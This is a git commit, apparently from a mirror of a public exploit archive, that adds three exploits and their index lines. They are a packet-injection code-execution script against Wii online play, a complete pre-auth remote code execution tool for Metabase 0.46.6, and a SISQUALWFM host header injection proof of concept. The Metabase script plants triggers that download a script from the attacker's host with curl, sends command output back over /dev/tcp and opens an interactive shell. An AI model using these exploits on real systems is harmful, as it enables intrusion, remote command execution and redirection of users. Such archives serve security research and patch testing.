Merge remote-tracking branch 'upstream/main'

CERTCC · Feb 16, 2024 · a043be6 · a043be6
2 parents 0eeb632 + bdcc81a
commit a043be6
Show file tree

Hide file tree

Showing 4 changed files with 338 additions and 0 deletions.
diff --git a/exploits/hardware/local/51798.py b/exploits/hardware/local/51798.py
@@ -0,0 +1,68 @@
+# Exploit Title: DS Wireless Communication Remote Code Execution
+# Date: 11 Oct 2023
+# Exploit Author: MikeIsAStar
+# Vendor Homepage: https://www.nintendo.com
+# Version: Unknown
+# Tested on: Wii
+# CVE: CVE-2023-45887
+
+"""This code will inject arbitrary code into a client's game.
+
+You are fully responsible for all activity that occurs while using this code.
+The author of this code can not be held liable to you or to anyone else as a
+result of damages caused by the usage of this code.
+"""
+
+import re
+import sys
+
+try:
+    import pydivert
+except ModuleNotFoundError:
+    sys.exit("The 'pydivert' module is not installed !")
+
+
+# Variables
+LR_SAVE = b'\x41\x41\x41\x41'
+assert len(LR_SAVE) == 0x04
+PADDING = b'MikeStar'
+assert len(PADDING) > 0x00
+
+# Constants
+DWC_MATCH_COMMAND_INVALID = b'\xFE'
+PADDING_LENGTH = 0x23C
+FINAL_KEY = b'\\final\\'
+WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'
+
+
+def try_modify_payload(payload):
+    message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
+    message = re.search(message_pattern, payload)
+    if not message:
+        return None
+
+    payload = payload[:message.end()]
+    payload += DWC_MATCH_COMMAND_INVALID
+    payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]
+    payload += LR_SAVE
+    payload += FINAL_KEY
+    return payload
+
+
+def main():
+    try:
+        with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
+            for packet in packet_buffer:
+                payload = try_modify_payload(packet.payload)
+                if payload is not None:
+                    print('Modified a GPCM message !')
+                    packet.payload = payload
+                packet_buffer.send(packet)
+    except KeyboardInterrupt:
+        pass
+    except PermissionError:
+        sys.exit('This program must be run with administrator privileges !')
+
+
+if __name__ == '__main__':
+    main()
diff --git a/exploits/linux/webapps/51797.py b/exploits/linux/webapps/51797.py
@@ -0,0 +1,165 @@
+# Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution
+# Google Dork: N/A
+# Date: 13-10-2023
+# Exploit Author: Musyoka Ian
+# Vendor Homepage: https://www.metabase.com/
+# Software Link: https://www.metabase.com/
+# Version: metabase 0.46.6
+# Tested on: Ubuntu 22.04, metabase 0.46.6
+# CVE : CVE-2023-38646
+
+#!/usr/bin/env python3
+
+import socket
+from http.server import HTTPServer, BaseHTTPRequestHandler
+from typing import Any
+import requests
+from socketserver import ThreadingMixIn
+import threading
+import sys
+import argparse
+from termcolor import colored
+from cmd import Cmd
+import re
+from base64 import b64decode
+
+
+class Termial(Cmd):
+    prompt = "metabase_shell > "
+    def default(self,args):
+        shell(args)
+
+
+class Handler(BaseHTTPRequestHandler):
+    def do_GET(self):
+        global success
+        if self.path == "/exploitable":
+
+            self.send_response(200)
+            self.end_headers()
+            self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0  > /dev/tcp/{argument.lhost}/{argument.lport}".encode())
+            success = True
+
+        else:
+            print(self.path)
+            #sys.exit(1)
+    def log_message(self, format: str, *args: Any) -> None:
+        return None
+
+class Server(HTTPServer):
+    pass
+
+def run():
+    global httpserver
+    httpserver = Server(("0.0.0.0", argument.sport), Handler)
+    httpserver.serve_forever()
+
+def exploit():
+    global success, setup_token
+    print(colored("[*] Retriving setup token", "green"))
+    setuptoken_request = requests.get(f"{argument.url}/api/session/properties")
+    setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1)
+    print(colored(f"[+] Setup token: {setup_token}", "green"))
+    print(colored("[*] Tesing if metabase is vulnerable", "green"))
+    payload = {
+        "token": setup_token,
+        "details":
+        {
+            "is_on_demand": False,
+            "is_full_sync": False,
+            "is_sample": False,
+            "cache_ttl": None,
+            "refingerprint": False,
+            "auto_run_queries": True,
+            "schedules":
+            {},
+            "details":
+            {
+                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;",
+                "advanced-options": False,
+                "ssl": True
+                },
+                "name": "an-sec-research-musyoka",
+                "engine": "h2"
+                }
+                }
+    timer = 0
+    print(colored(f"[+] Starting http server on port {argument.sport}", "blue"))
+    thread = threading.Thread(target=run, )
+    thread.start()
+    while timer != 120:
+        test = requests.post(f"{argument.url}/api/setup/validate", json=payload)
+        if success == True :
+            print(colored("[+] Metabase version seems exploitable", "green"))
+            break
+        elif timer == 120:
+            print(colored("[-] Service does not seem exploitable exiting ......", "red"))
+            sys.exit(1)
+
+    print(colored("[+] Exploiting the server", "red"))
+
+
+    terminal = Termial()
+    terminal.cmdloop()
+
+
+def shell(command):
+    global setup_token, payload2
+    payload2 = {
+        "token": setup_token,
+        "details":
+        {
+            "is_on_demand": False,
+            "is_full_sync": False,
+            "is_sample": False,
+            "cache_ttl": None,
+            "refingerprint": False,
+            "auto_run_queries": True,
+            "schedules":
+            {},
+            "details":
+            {
+                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x",
+                "advanced-options": False,
+                "ssl": True
+                },
+                "name": "an-sec-research-team",
+                "engine": "h2"
+                }
+                }
+
+    output = requests.post(f"{argument.url}/api/setup/validate", json=payload2)
+    bind_thread = threading.Thread(target=bind_function, )
+    bind_thread.start()
+    #updating the payload
+    payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x"
+    requests.post(f"{argument.url}/api/setup/validate", json=payload2)
+    #print(output.text)
+
+
+def bind_function():
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.bind(("0.0.0.0", argument.lport))
+        sock.listen()
+        conn, addr = sock.accept()
+        data = conn.recv(10240).decode("ascii")
+        print(f"\n{(b64decode(data)).decode()}")
+    except Exception as ex:
+        print(colored(f"[-] Error: {ex}", "red"))
+        pass
+
+
+
+if __name__ == "__main__":
+    print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta"))
+    args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]")
+    args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True)
+    args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True)
+    args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True)
+    args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True)
+    argument  = args.parse_args()
+    if argument.url.endswith("/"):
+        argument.url = argument.url[:-1]
+    success = False
+    exploit()
diff --git a/exploits/multiple/webapps/51796.txt b/exploits/multiple/webapps/51796.txt
@@ -0,0 +1,102 @@
+# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
+# Discovered Date: 17/03/2023
+# Reported Date: 17/03/2023
+# Resolved Date: 13/10/2023
+# Exploit Author: Omer Shaik (unknown_exploit)
+# Vendor Homepage: https://www.sisqualwfm.com
+# Version: 7.1.319.103
+# Tested on: SISQUAL WFM 7.1.319.103
+# Affected Version: sisqualWFM - 7.1.319.103
+# Fixed Version: sisqualWFM - 7.1.319.111
+# CVE : CVE-2023-36085
+# CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+# Category: Web Apps
+
+
+
+
+A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.
+
+****************************************************************************************************
+Orignal Request
+****************************************************************************************************
+GET /sisqualIdentityServer/core/login HTTP/2
+Host: sisqualwfm.cloud
+Cookie:<cookie>
+Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Linux"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+****************************************************************************************************
+Orignal Response
+****************************************************************************************************
+HTTP/2 302 Found
+Cache-Control: no-store, no-cache, must-revalidate
+Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
+Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
+X-Content-Type-Options: nosniff
+X-Frame-Options: sameorigin
+Date: Wed, 22 Mar 2023 13:22:10 GMT
+Content-Length: 0
+****************************************************************************************************
+
+
+
+
+██████╗  ██████╗  ██████╗
+██╔══██╗██╔═══██╗██╔════╝
+██████╔╝██║   ██║██║
+██╔═══╝ ██║   ██║██║
+██║     ╚██████╔╝╚██████╗
+╚═╝      ╚═════╝  ╚═════╝
+
+
+
+
+****************************************************************************************************
+Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
+****************************************************************************************************
+GET /sisqualIdentityServer/core/login HTTP/2
+Host: evil.com
+Cookie:<cookie>
+Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Linux"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+****************************************************************************************************
+Response
+****************************************************************************************************
+HTTP/2 302 Found
+Cache-Control: no-store, no-cache, must-revalidate
+Location: https://evil.com/sisqualIdentityServer/core/
+Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
+X-Content-Type-Options: nosniff
+X-Frame-Options: sameorigin
+Content-Length: 0
+
+
+****************************************************************************************************
+Method of Attack
+****************************************************************************************************
+
+curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
+
+****************************************************************************************************
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -3259,6 +3259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware,,2010-11-03,2014-10-14,1,CVE-2010-3039;OSVDB-69158,,,,,https://www.securityfocus.com/bid/44672/info
 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",2022-02-21,ibby,local,hardware,,2022-02-21,2022-02-21,0,,,,,,
 24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",local,hardware,,2013-03-29,2013-03-29,0,OSVDB-91811,,,,,
+51798,exploits/hardware/local/51798.py,"DS Wireless Communication - Remote Code Execution",2024-02-15,MikeIsAStar,local,hardware,,2024-02-15,2024-02-15,0,,,,,,
 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",2021-09-13,Neurogenesia,local,hardware,,2021-09-13,2021-09-13,0,,,,,,
 51414,exploits/hardware/local/51414.py,"FS-S3900-24T4S - Privilege Escalation",2023-05-02,"Daniele Linguaglossa",local,hardware,,2023-05-02,2023-05-02,0,CVE-2023-30350,,,,,
 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,,2018-03-19,2018-03-19,0,CVE-2015-8088,,,,,https://github.com/hardenedlinux/offensive_poc/blob/0cfe3764a0388e3715b018d1d59ef801f8b16b73/CVE-2015-8088/cve-2015-8088-poc.c
@@ -8945,6 +8946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10433,exploits/linux/webapps/10433.txt,"Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-14,"Milos Zivanovic",webapps,linux,80,2009-12-13,,1,OSVDB-61052;CVE-2009-4827,,,,,
 14818,exploits/linux/webapps/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",webapps,linux,,2010-08-27,2017-07-19,0,,,,,,
 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,,2018-05-21,2018-06-15,0,,"Cross-Site Request Forgery (CSRF)",,,,
+51797,exploits/linux/webapps/51797.py,"Metabase 0.46.6 - Pre-Auth Remote Code Execution",2024-02-15,"Musyoka Ian",webapps,linux,,2024-02-15,2024-02-15,0,,,,,,
 46450,exploits/linux/webapps/46450.txt,"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation",2019-02-22,SecureAuth,webapps,linux,,2019-02-22,2019-02-22,1,CVE-2019-3475;CVE-2019-3474,Traversal,,,,https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities
 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,,2019-10-03,2019-10-03,0,CVE-2019-17080,,,,,
 28653,exploits/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,webapps,linux,,2013-09-30,2013-09-30,0,CVE-2013-5697;OSVDB-97588,,,,,
@@ -12176,6 +12178,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
+51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,,
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,